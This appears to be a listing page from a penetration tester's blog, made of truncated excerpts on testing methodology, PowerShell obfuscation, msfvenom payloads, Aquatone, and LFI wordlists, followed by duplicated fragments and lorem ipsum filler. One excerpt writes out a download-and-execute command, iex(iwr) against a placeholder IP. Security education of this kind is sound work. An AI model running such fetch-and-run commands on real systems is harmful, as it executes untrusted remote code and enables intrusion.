Pentesting Methodology
An advanced penetration testing methodology should be comprehensive and follow a structured approach. Here is a detailed methodology focusing on
Security insights and articles written by Zak.
Security Consultant / Penetration Tester / Bug Hunter
An advanced penetration testing methodology should be comprehensive and follow a structured approach. Here is a detailed methodology focusing on
Here is a list of different PowerShell Obfuscation Techniques, in no particular order: Example command to execute iex(iwr http://10.10.10.10/script.ps1): These
Disclaimer: This is a clone of the article – https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/. All credits go to the author of the article. The
Inspired by the recent nslookup bypass you can do with PowerShell I invested some time to see if using the
Installing Aquatone Install Chromium Wget the Aquatone release from GitHub Unzip the tool Remove the additional files Then move the
Using JQ to parse the data Using Grep to parse the data
Installation Sometimes you have to specify pip3: Usage Create a new folder where you want to start building the application
Helpful wordlist for enumerating files through path traversal or local file inclusion:
Helpful wordlist for enumerating files through path traversal or local file inclusion: Helpful things to look at are:
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.